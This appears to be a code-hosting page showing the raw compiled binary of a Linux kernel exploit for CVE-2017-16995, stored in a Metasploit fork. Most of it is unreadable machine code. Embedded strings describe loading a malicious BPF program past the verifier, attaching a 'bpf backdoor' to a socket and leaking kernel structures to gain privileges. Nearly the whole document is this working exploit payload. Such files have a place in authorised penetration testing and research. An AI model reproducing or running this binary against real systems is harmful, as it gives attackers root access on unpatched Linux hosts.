Files
metasploit-gs/data/exploits/cve-2017-16995/exploit.out
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

40 lines
22 KiB
Plaintext
Raw Normal View History

ELF>@xO@8
@@@@ØØˆ ˆ ¥¥000P=PMPMÀp`=`M`Mðð888 XXXDDSåtd888 Påtd„3„3„3ììQåtdRåtdP=PMPM°°/lib64/ld-linux-x86-64.so.2GNUÀGNU³TÛO<¡ÈªRÝX¡ŒåÃlGNU(ŒÑeÎm9ò‹9 Qkc¤Þ .£ jí ˆJ Pq"\@Plibc.so.6exitexeclperror__stack_chk_failsocketpair__errno_locationstdoutsetsockoptstderrgetuidfwrite__cxa_finalizesyscallstrerror__libc_start_mainvfprintfGLIBC_2.4GLIBC_2.2.5_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTableii
¬ui PMàXM PPØOàOèO
ðOøO P@PhOpOxO€OˆOO˜O  O ¨O °O
¸OÀOÈOÐOóúHƒìH‹Ù?H…ÀtÿÐHƒÄÃÿ52?òÿ%3?óúhòéáÿÿÿóúhòéÑÿÿÿóúhòéÁÿÿÿóúhòé±ÿÿÿóúhòé¡ÿÿÿóúhòé‘ÿÿÿóúhòéÿÿÿóúhòéqÿÿÿóúhòéaÿÿÿóúh òéQÿÿÿóúh
òéAÿÿÿóúh òé1ÿÿÿóúh òé!ÿÿÿóúh
òéÿÿÿóúòÿ%Ý>Dóúòÿ%=>Dóúòÿ%5>Dóúòÿ%->Dóúòÿ%%>Dóúòÿ%>Dóúòÿ%>Dóúòÿ%
>Dóúòÿ%>Dóúòÿ%ý=Dóúòÿ%õ=Dóúòÿ%í=Dóúòÿ%å=Dóúòÿ%Ý=Dóúòÿ%Õ=Dóú1íI‰Ñ^H‰âHƒäðPTLvH
2018-07-13 23:01:17 +00:00
ÿH=dÿ²=ôH=Ù=HÒ=H9øtHŽ=H…Àt ÿàÃH=©=H5¢=H)þH‰ðHÁî?HÁøHÆHÑþtH‹e=H…ÀtÿàfDÃóú€==u+UHƒ=B=H‰åt H=F=èIþÿÿèdÿÿÿÆu=ÃóúéwÿÿÿóúUH‰åH‰}øH‹Eø]ÃóúUH‰åHì ‰½|ÿÿÿH‰µpÿÿÿ‰•xÿÿÿH‰hÿÿÿD‰…dÿÿÿdH‹%(H‰Eø1ÀHU€¸¹H‰×óH«‹…|ÿÿÿ‰E€‹…xÿÿÿH˜HÁè‰E„H‹…pÿÿÿH‰ÇètÿÿÿH‰EˆH‹…hÿÿÿH‰ÇèaÿÿÿH‰EÇE˜ÇEœH==èCÿÿÿH‰E ‹…dÿÿÿ‰E¨Æ=HE€¹pH‰Â¾¿A¸è¦ýÿÿH‹uødH34%(tèbýÿÿÉÃóúUH‰åHì ‰½|ÿÿÿ‰µxÿÿÿ‰•tÿÿÿ‰pÿÿÿD‰…lÿÿÿdH‹%(H‰Eø1ÀHU€¸¹H‰×óH«‹…|ÿÿÿ‰E€‹…xÿÿÿ‰E„‹…tÿÿÿ‰Eˆ‹…pÿÿÿ‰EŒHE€¹pH‰Â¾¿A¸èûüÿÿH‹uødH34%(tè·üÿÿÉÃóúUH‰åHì ‰½|ÿÿÿH‰µpÿÿÿH‰•hÿÿÿH‰`ÿÿÿdH‹%(H‰Eø1ÀHU€¸¹H‰×óH«‹…|ÿÿÿ‰E€H‹…pÿÿÿH‰ÇèéýÿÿH‰EˆH‹…hÿÿÿH‰ÇèÖýÿÿH‰EH‹…`ÿÿÿH‰E˜HE€¹pH‰Â¾¿A¸è>üÿÿH‹uødH34%(tèúûÿÿÉÃóúUH‰åHì ‰½|ÿÿÿH‰µpÿÿÿH‰•hÿÿÿdH‹%(H‰Eø1ÀHU€¸¹H‰×óH«‹…|ÿÿÿ‰E€H‹…pÿÿÿH‰Çè3ýÿÿH‰EˆH‹…hÿÿÿH‰Çè ýÿÿH‰EHE€¹pH‰Â¾¿A¸è“ûÿÿH‹uødH34%(tèOûÿÿÉÃóúUH‰åHì€dH‹%(H‰Eø1ÀÆ…€þÿÿ´¶…þÿÿƒàðƒÈˆ…þÿÿ¶…þÿÿƒàˆ…þÿÿfÇ…‚þÿÿÇ…„þÿÿÿÿÿÿÆ…ˆþÿÿU¶…‰þÿÿƒàðƒÈˆ…‰þÿÿ¶…‰þÿÿƒàˆ…‰þÿÿfÇ…ŠþÿÿÇ…ŒþÿÿÿÿÿÿÆ…þÿÿ·¶…‘þÿÿƒàðˆ…‘þÿÿ¶…‘þÿÿƒàˆ…‘þÿÿfÇ…’þÿÿÇ…”þÿÿÆ…˜þÿÿ•¶…™þÿÿƒàðˆ…™þÿÿ¶…™þÿÿƒàˆ…™þÿÿfÇ…šþÿÿÇ…œþÿÿÆ… þÿÿ{¶…¡þÿÿƒàðƒÈ
ˆ…¡þÿÿ¶…¡þÿÿƒàƒÈˆ…¡þÿÿfÇ…¢þÿÿðÿÇ…¤þÿÿÆ…¨þÿÿ¶…©þÿÿƒàðƒÈ ˆ…©þÿÿ¶…©þÿÿƒàƒÈˆ…©þÿÿfÇ…ªþÿÿÝ8‰…¬þÿÿÆ…°þÿÿ¶…±þÿÿƒàðˆ…±þÿÿ¶…±þÿÿƒàˆ…±þÿÿfÇ…²þÿÿ¡8H˜HÁè ‰…´þÿÿÆ…¸þÿÿ¿¶…¹þÿÿƒàðƒÈˆ…¹þÿÿ¶…¹þÿÿƒàƒÈˆ…¹þÿÿfÇ…ºþÿÿÇ…¼þÿÿÆ…Àþÿÿ¿¶…ÁþÿÿƒàðƒÈˆ…Áþÿÿ¶…ÁþÿÿƒàƒÈ ˆ…ÁþÿÿfÇ…ÂþÿÿÇ…ÄþÿÿÆ…Èþÿÿ¶…ÉþÿÿƒàðƒÈˆ…Éþÿÿ¶…Éþÿÿƒàˆ…ÉþÿÿfÇ…ÊþÿÿÇ…ÌþÿÿüÿÿÿÆ…Ðþÿÿb¶…ÑþÿÿƒàðƒÈ
ˆ…Ñþÿÿ¶…Ñþÿÿƒàˆ…ÑþÿÿfÇ…ÒþÿÿüÿÇ…ÔþÿÿÆ…Øþÿÿ…¶…Ùþÿÿƒàðˆ…Ùþÿÿ¶…Ùþÿÿƒàˆ…ÙþÿÿfÇ…ÚþÿÿÇ…ÜþÿÿÆ…àþÿÿU¶…áþÿÿƒàðˆ…áþÿÿ¶…áþÿÿƒàˆ…áþÿÿfÇ…âþÿÿÇ…äþÿÿÆ…èþÿÿ•¶…éþÿÿƒàðˆ…éþÿÿ¶…éþÿÿƒàˆ…éþÿÿfÇ…êþÿÿÇ…ìþÿÿÆ…ðþÿÿy¶…ñþÿÿƒàðƒÈˆ…ñþÿÿ¶…ñþÿÿƒàˆ…ñþÿÿfÇ…òþÿÿÇ…ôþÿÿÆ…øþÿÿ¿¶…ùþÿÿƒàðƒÈˆ…ùþÿÿ¶…ùþÿÿƒàƒÈˆ…ùþÿÿfÇ…úþÿÿÇ…üþÿÿÆ…ÿÿÿ¿¶…ÿÿÿƒàðƒÈˆ…ÿÿÿ¶…ÿÿÿƒàƒÈ ˆ…ÿÿÿfÇ…ÿÿÿÇ…ÿÿÿÆ…ÿÿÿ¶… ÿÿÿƒàðƒÈˆ… ÿÿÿ¶… ÿÿÿƒàˆ… ÿÿÿfÇ…
ÿÿÿÇ… ÿÿÿüÿÿÿÆ…ÿÿÿb¶…ÿÿÿƒàðƒÈ
ˆ…ÿÿÿ¶…ÿÿÿƒàˆ…ÿÿÿfÇ…ÿÿÿüÿÇ…ÿÿÿÆ…ÿÿÿ…¶…ÿÿÿƒàðˆ…ÿÿÿ¶…ÿÿÿƒàˆ…ÿÿÿfÇ…ÿÿÿÇ…ÿÿÿÆ… ÿÿÿU¶…!ÿÿÿƒàðˆ…!ÿÿÿ¶…!ÿÿÿƒàˆ…!ÿÿÿfÇ…"ÿÿÿÇ…$ÿÿÿÆ…(ÿÿÿ•¶…)ÿÿÿƒàðˆ…)ÿÿÿ¶…)ÿÿÿƒàˆ…)ÿÿÿfÇ…*ÿÿÿÇ…,ÿÿÿÆ…0ÿÿÿy¶…1ÿÿÿƒàðƒÈˆ…1ÿÿÿ¶…1ÿÿÿƒàˆ…1ÿÿÿfÇ…2ÿÿÿÇ…4ÿÿÿÆ…8ÿÿÿ¿¶…9ÿÿÿƒàðƒÈˆ…9ÿÿÿ¶…9ÿÿÿƒàƒÈˆ…9ÿÿÿfÇ…:ÿÿÿÇ…<ÿÿÿÆ…@ÿÿÿ¿¶…AÿÿÿƒàðƒÈˆ…Aÿÿÿ¶…AÿÿÿƒàƒÈ ˆ…AÿÿÿfÇ…BÿÿÿÇ…DÿÿÿÆ…Hÿÿÿ¶…IÿÿÿƒàðƒÈˆ…Iÿÿÿ¶…Iÿÿÿƒàˆ…IÿÿÿfÇ…JÿÿÿÇ…LÿÿÿüÿÿÿÆ…Pÿÿÿb¶…QÿÿÿƒàðƒÈ
ˆ…Qÿÿÿ¶…Qÿÿÿƒàˆ…QÿÿÿfÇ…RÿÿÿüÿÇ…TÿÿÿÆ…Xÿÿÿ…¶…Yÿÿÿƒàðˆ…Yÿÿÿ¶…Yÿÿÿƒàˆ…YÿÿÿfÇ…ZÿÿÿÇ…\ÿÿÿÆ…`ÿÿÿU¶…aÿÿÿƒàðˆ…aÿÿÿ¶…aÿÿÿƒàˆ…aÿÿÿfÇ…bÿÿÿÇ…dÿÿÿÆ…hÿÿÿ•¶…iÿÿÿƒàðˆ…iÿÿÿ¶…iÿÿÿƒàˆ…iÿÿÿfÇ…jÿÿÿÇ…lÿÿÿÆ…pÿÿÿy¶…qÿÿÿƒàðƒÈˆ…qÿÿÿ¶…qÿÿÿƒàˆ…qÿÿÿfÇ…rÿÿÿÇ…tÿÿÿÆ…xÿÿÿ¿¶…yÿÿÿƒàðƒÈˆ…yÿÿÿ¶…yÿÿÿƒàˆ…yÿÿÿfÇ…zÿÿÿÇ…|ÿÿÿÆE€·¶EƒàðˆE¶EƒàˆEfÇE‚ÇE„ÆEˆU¶E‰ƒàðƒÈˆE‰¶E‰ƒàˆE‰fÇEŠÇEŒÆE{¶E‘ƒàðƒÈˆE‘¶E‘ƒàƒÈ ˆE‘fÇE’ÇE”ÆE˜•¶E™ƒàðˆE™¶E™ƒàˆE™fÇEšÇEœÆE U¶E¡ƒàðƒÈˆE¡¶E¡ƒàˆE¡fÇE¢ÇE¤ÆE¨y¶E©ƒàðƒÈˆE©¶E©ƒàƒÈ ˆE©fÇEªðÿÇE¬ÆE°{¶E±ƒàðƒÈˆE±¶E±ƒàƒÈ0ˆE±fÇE²ÇE´ÆE¸•¶E¹ƒàðˆE¹¶E¹ƒàˆE¹fÇEºÇE¼ÆEÀU¶EÁƒàðƒÈˆEÁ¶EÁƒàˆEÁfÇEÂÇEÄÆEÈy¶EɃàðƒÈˆEɶEɃàƒÈpˆEÉfÇEÊÇEÌÆEÐ{¶EуàðƒÈˆEѶEуàƒÈ0ˆEÑfÇEÒÇEÔÆEØ•¶EÙƒàðˆEÙ¶EÙƒàˆEÙfÇEÚÇEÜÆEà{¶EáƒàðƒÈˆEá¶EáƒàƒÈ€ˆEáfÇEâÇEäÆEè•¶EéƒàðˆEé¶EéƒàˆEéfÇEêÇEìH…€þÿÿA¸H
ºpH‰Æ¿èãòÿÿH‹UødH3%(tè$ñÿÿÉÃóúUH‰åHìàH‰½(ÿÿÿH‰µXÿÿÿH‰•`ÿÿÿH‰hÿÿÿL‰…pÿÿÿL‰xÿÿÿ„Àt )E€)M)U )]°)eÀ)mÐ)uà)}ðdH%(H‰…Hÿÿÿ1ÀÇ…0ÿÿÿÇ…4ÿÿÿ0HEH‰…8ÿÿÿH…PÿÿÿH‰…@ÿÿÿH‹O/H‰Áº¾H='èæðÿÿH‹//H•0ÿÿÿH‹(ÿÿÿH‰ÎH‰Çè¦ðÿÿH‹…HÿÿÿdH3%(tè.ðÿÿÉÃóúUH‰åHìàH‰½(ÿÿÿH‰µXÿÿÿH‰•`ÿÿÿH‰hÿÿÿL‰…pÿÿÿL‰xÿÿÿ„Àt )E€)M)U )]°)eÀ)mÐ)uà)}ðdH%(H‰…Hÿÿÿ1ÀÇ…0ÿÿÿÇ…4ÿÿÿ0HEH‰…8ÿÿÿH…PÿÿÿH‰…@ÿÿÿH‹Y.H‰Áº¾H=6èðïÿÿH‹9.H•0ÿÿÿH‹(ÿÿÿH‰ÎH‰Çè°ïÿÿH‹…HÿÿÿdH3%(tè8ïÿÿÉÃóúUH‰åHìàH‰½(ÿÿÿH‰µXÿÿÿH‰•`ÿÿÿH‰hÿÿÿL‰…pÿÿÿL‰xÿÿÿ„Àt )E€)M)U )]°)eÀ)mÐ)uà)}ðdH%(H‰…Hÿÿÿ1ÀÇ…0ÿÿÿÇ…4ÿÿÿ0HEH‰…8ÿÿÿH…PÿÿÿH‰…@ÿÿÿ‹-…Àt"HY-H‰Áº¾H=;
èðîÿÿë@H‹7-H‰Áº¾H=
èÎîÿÿH‹-H•0ÿÿÿH‹(ÿÿÿH‰ÎH‰ÇèŽîÿÿH‹…HÿÿÿdH3%(tèîÿÿÉÃóúUH‰åHìàH‰½(ÿÿÿH‰µXÿÿÿH‰•`ÿÿÿH‰hÿÿÿL‰…pÿÿÿL‰xÿÿÿ„Àt )E€)M)U )]°)eÀ)mÐ)uà)}ðdH%(H‰…Hÿÿÿ1ÀÇ…0ÿÿÿÇ…4ÿÿÿ0HEH‰…8ÿÿÿH…PÿÿÿH‰…@ÿÿÿH‹B,H‰Áº¾H=A èÙíÿÿH",H•0ÿÿÿH‹(ÿÿÿH‰ÎH‰Çè™íÿÿ¿èŸíÿÿóúUH‰åH= ¸èôûÿÿH=ÿ ¸èãûÿÿH ¸èÒûÿÿH=5 ¸èÁûÿÿH ¸è°ûÿÿH=i ¸è‹ýÿÿA¸¹º¾¿èBïÿÿ‰´+®+…Ày"è]ìÿÿ‹‰ÇèíÿÿH‰ÆH=* ¸è[þÿÿH=9 ¸è)ýÿÿ¸èñÿÿ‰k+e+…ÀyFèìÿÿ‹ƒø
uH5¢+H= ¸èõûÿÿèìëÿÿ‹‰Çè£ìÿÿH‰ÆH= ¸èêýÿÿH= ¸è¸üÿÿH
÷*º¾¿èìÿÿ…Àt"èšëÿÿ‹‰ÇèQìÿÿH‰ÆH ¸è˜ýÿÿH ¸èfüÿÿ‹ª*H
¥*º2¾‰ÇèXëÿÿ…Ày"è?ëÿÿ‹‰ÇèöëÿÿH‰ÆH ¸è=ýÿÿ]ÃóúUH‰åHƒìM*º@H5a*‰ÇèëÿÿH‰EøHƒ}øyH ècëÿÿë&Hƒ}ø@tHó)HUøH5‰ H‰Ç¸è ëÿÿÉÃóúUH‰åHƒì‰}üH‰uð‹è)HUðHuü¹‰Çèîÿÿ…Àt"èƒêÿÿ‹‰Çè:ëÿÿH‰ÆH=C ¸èüÿÿÉÃóúUH‰åHƒì ‰}ìdH‹%(H‰Eø1À‹‡)HUðHMìH‰Î‰Çèeîÿÿ…Àt"è$êÿÿ‹‰ÇèÛêÿÿH‰ÆH= ¸è"üÿÿHEðHMødH3 %(tèêÿÿÉÃóúUH‰åHƒì H‰}øH‰uðH‰UèH‹EøH‰Æ¿è ÿÿÿH‹EðH‰Æ¿èúþÿÿH‹EèH‰Æ¿èéþÿÿ¸èyþÿÿ¿è+ÿÿÿÉÃóúUH‰åº¾¿èƒÿÿÿ]ÃóúUH‰åº¾¿èeÿÿÿ]ÃóúUH‰åHƒìH‰}øH‹EøºH‰Æ¿è=ÿÿÿÉÃóúUH‰åHƒìH‰}øH‰uðH‹UðH‹EøH‰Æ¿èÿÿÿÉÃóúUH‰åHƒì0è+éÿÿ‰EܸèRÿÿÿH‰EèH‹EèHƒÀH‰ÇèzÿÿÿH‰EàH‹EèH‰ÆH¸è²øÿÿH‹EàH‰ÆH¸èšøÿÿH¸ÿÿÿÿÿ‡ÿÿH9EàwH=¿ ¸èúÿÿÇEØéÂH‹EàH‰Çè
ÿÿÿHºÿÿÿÿÿÿÿH9Ð…šH‹EàHƒèH‰ÇèêþÿÿH‰EðH¸ÿÿÿÿÿ‡ÿÿH9EðvrH‹EðHƒÀH‰ÇèÆþÿÿƒàÿH‰Eø‹EÜH9EøuU‹EØÁà‰ÆH=g ¸èñ÷ÿÿH‹EðH‰ÆH=o ¸èÙ÷ÿÿ‹UÜH‹EøH‰ÆH=l ¸è¾÷ÿÿH‹Eðë(ëƒEØHƒEàƒ}ØcŽ4ÿÿÿH=t ¸è§ùÿÿÉÃóúUH‰åHƒì H‰}èH‹EèH‰ÆH=l ¸èf÷ÿÿH‹EèH‰ÇèþÿÿƒàÿH‰EøH‹UøH‹EèH‰ÖH‰ÇèþÿÿHƒEèH‹Eè¾H‰ÇèþýÿÿHƒEèH‹Eè¾H‰ÇèèýÿÿHƒEèH‹Eè¾H‰ÇèÒýÿÿHƒEèH‹Eè¾H‰Çè¼ýÿÿHƒEèH‹EèHÇÆÿÿÿÿH‰Çè¤ýÿÿHƒEèH‹EèHÇÆÿÿÿÿH‰ÇèŒýÿÿHƒEèH‹EèHÇÆÿÿÿÿH‰ÇètýÿÿHƒEèÉÃóúUH‰åHƒì‰}üH‰uð¸èxùÿÿ¸èqýÿÿH‰ÇèÛþÿÿH=†¸èXöÿÿºH5™H=’¸èçÿÿ…Àt"è.æÿÿ‹‰ÇèåæÿÿH‰ÆH=t¸è,øÿÿ¸ÉÃf.óúAWL=#"AVI‰ÖAUI‰õATA‰üUH-"SL)ýHƒìè¯äÿÿHÁýtL‰òL‰îD‰çAÿßHƒÃH9ÝuêHƒÄ[]A\A]A^A_Ãff.óúÃóúHƒìHƒÄÃ
[!]
t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
creating bpf map
failed to create bpf map: '%s'
sneaking evil bpf past the verifier
log:
%sfailed to load prog '%s'
creating socketpair()
failed to create socket pair '%s'
attaching bpf backdoor to socket
setsockopt '%s'
writeshort write: %zd
bpf_update_elem failed '%s'
bpf_lookup_elem failed '%s'
skbuff => %llx
Leaking sock struct from %llx
Failed to find Sock address from sk_buff.
Sock->sk_rcvtimeo at offset %d